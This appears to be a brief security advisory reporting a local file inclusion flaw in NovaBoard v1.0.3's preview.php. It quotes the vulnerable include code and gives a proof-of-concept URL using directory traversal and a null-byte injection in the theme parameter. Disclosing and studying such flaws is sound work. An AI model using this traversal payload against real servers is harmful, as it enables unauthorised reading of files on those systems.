NovaBoard version 1.0.3 suffers from a local file inclusion vulnerability in preview.php.
422a9df9b900c8971cd13fbcdda69c2288085ccd304152f65104d31c7704f63f##############################################################################################
[+] NovaBoard v1.0.3 (preview.php theme) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##############################################################################################
[+] Local File Inclusion
register_globals = on
magic_quotes_gpc=off
- Vulnerable code in /includes/forums/preview.php :
-----------------------------------------------------------------
if (file_exists("../../themes/$theme/scripts/php/parse.php")){
include "../../themes/$theme/scripts/php/parse.php";
-----------------------------------------------------------------
PoC :
http://127.0.0.1/includes/forums/preview.php?theme=../../../../../../BOOTSECT.BAK%00
##############################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed